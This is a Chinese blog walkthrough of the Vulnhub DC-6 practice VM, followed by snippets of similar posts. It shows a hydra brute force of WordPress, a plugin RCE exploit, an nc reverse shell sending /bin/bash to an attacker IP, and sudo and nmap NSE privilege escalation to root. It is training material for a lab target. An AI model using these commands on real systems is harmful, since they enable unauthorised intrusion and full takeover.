[Vulnhub] DC-6

最新推荐文章于 2024-01-11 19:26:29 发布
最新推荐文章于 2024-01-11 19:26:29 发布
阅读量419 收藏
点赞数 1
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/128783869
版权

下载链接:https://download.vulnhub.com/dc/DC-6.zip

知识点:

  • wordpress-getshell
  • nc反弹shell
  • 横向越权
  • nmap提权

目录

<1> 信息搜集

<2> wordpress_Activity  monitor插件rce漏洞getshell

<3> Privilege Escalation(nmap提权)

<1> 信息搜集

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.136

nmap -A -p 1-65535 192.168.236.136 扫描一下靶机开放哪些服务

开放了22端口 ssh服务以及80端口 http服务 

要改一下/etc/hosts文件 使得可以解析wordy域名

 

再扫一下存在的漏洞

扫出来了应该是wordpress  后台admin登陆地址为:wp-login.php 以及可能的用户名

admin
mark
graham
sarah
jens

hydra爆破一下后台密码

首先将可能的用户 写入user.txt

然后根据提示,生成对应的密码文件

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

hydra -L user.txt -P pass.txt 192.168.236.136 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:S=logout"

得到 mark的密码 helpdesk01

<2> wordpress_Activity  monitor插件rce漏洞getshell

登录,寻找getshell点 没找到上传文件或者编辑文件的地方

 Activity  monitor插件

看见了好多自己之前爆破 的一些个操作

searchsploit Activity  monitor 发现了一个该插件的RCE的漏洞

 searchsploit -m 50110.py 下载下来  文件里有它的用法:

 查看脚本详细内容:

发现在 IP tools这一栏是存在rce漏洞   也算是知道了这个脚本的利用点(争取不当纯脚本小子)

执行脚本,输入对应参数,成功拿到shell

查看内核版本 uname -a  以及 cat /etc/issue

但是这个shell 才执行没几句命令就断开了,不太好用

换成nc反弹shell,脚本的shell连接之后

nc -lvvp 4444      kali里起一个监听 

nc 192.168.236.128 -e /bin/bash 4444    反弹shell到kali

python -c 'import pty;pty.spawn("/bin/bash");'  转为交互式

 看看有没有可用信息,进入/home里查看,发现了things-to-do.txt 里面泄露了graham账户密码 GSo7isUM1D4
切换为graham用户,sudo -l

发现 graham可以 以jens身份 无需密码 执行/home/jens/backups.sh

/bin/bash 写入可执行文件backups.sh里

echo "/bin/bash" >>/home/jens/backups.sh

 以jens身份运行 backups.sh

sudo -u jens ./backups.sh   #sudo -u指定用户执行命令

<3> Privilege Escalation(nmap提权)

切换为jens用户之后 sudo -l查看用户权限

发现可以以root身份 无需密码 执行nmap

#nse是nmap的插件扩展名

nmap 的--script参数可以执行.nse脚本文件,可以创建一个.nse脚本文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' >a.nse
sudo nmap --script=a.nse

成功提权为root   在root目录下,得到flag

 

葫芦娃42
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机DC系列-DC-6
m0_54525483的博客
01-07 1651
Vulnhub靶机DC系列-DC-6 靶场名称:DC-6 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ 下载地址: DC-6.zip (Size: 619 MB) Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vuln
Vulnhub-DC-6
T1me
10-30 227
入门系列第三弹DC-6 基本信息 下载地址:DC-6 靶机:vmware,192.168.172.138 攻击机:kali2 Flag:1个 渗透过程 0x01 nmap扫描 扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。 0x02 漏洞发现 访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。 访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。 wpscan --url http
Vulnhub DC-6
柠檬木有枝
07-14 483
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
VulnHubDC-6
weixin_39219503的博客
02-01 303
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub_DC-6
高野02blog
01-20 141
Vulnhub提示: 扫描靶机IP地址:nmap -sP 192.168.10.0/24 扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129 开放端口22,80 访问80端口发现URL被重定向到wordy 我们需要在host文件中添加 文件位置 /etc/hosts 可以访问到啦 扫描下目录结构吧, 御剑扫描 发现是wordpress站点 使用WPscan扫描 一款专注于wordpress站点扫描工具 wpscan -url
vulnhubdc6
qq_54030686的博客
06-14 845
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
vulnhub靶场之DC-6
qq_58091216的博客
01-11 1014
只有一个flag。
vulnhub渗透测试靶机DC-6
weixin_46128614的博客
01-19 463
靶机地址:https://www.vulnhub.com/entry/dc-6,315/ nmap –sS –sV –p- -T5 dirb跑一下,全是wp的目录 上wpscan 改一下hosts 加一条 192.168.49.20 wordy 没有发现漏洞 发现几个用户 逐一爆破吧 开开心心爆了半个小时,进度0.1%,这么多用户感觉爆破思路不会错,看了一眼师傅的wp,原来作者在vulnhu...
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 353
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
vulnhubDC6靶机
LainWith的博客
02-14 533
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 644
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
VulnHub靶机系列】DC6
Ms08067安全实验室
08-02 193
文章来源|MS08067 安全实验室本文作者:大方子(Ms08067实验室核心成员)主机信息Kali:192.168.0.128 DC-6:192.168.0.130实验过程先找到DC-6的IP地址sudoarp-scan--interfaceeth0192.168.0.1/24然后用Nmap对DC-6进行扫描sudonmap-sS-sC-sV-p-192.168.0.130可...
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3869
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值